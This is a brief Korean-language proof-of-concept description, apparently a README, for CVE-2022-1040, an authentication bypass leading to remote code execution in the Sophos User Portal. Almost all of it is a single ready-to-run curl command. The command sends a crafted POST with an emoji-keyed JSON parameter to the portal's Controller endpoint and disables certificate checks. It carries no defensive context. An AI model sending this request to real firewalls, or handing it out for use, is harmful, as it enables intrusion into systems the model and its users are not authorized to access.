
CVE-2022-1040에 대한 개념 증명 익스플로잇으로, Sophos User Portal을 대상으로 조작된 XMLHttpRequest POST를 통해 원격 코드 실행을 유발합니다.
poc가 당신과 함께하길
curl --insecure -H "X-Requested-With: XMLHttpRequest" -X POST 'https://x.x.x.x/userportal/Controller?mode=8700&operation=1&datagrid=179&json=\{"🦞":"test"\}'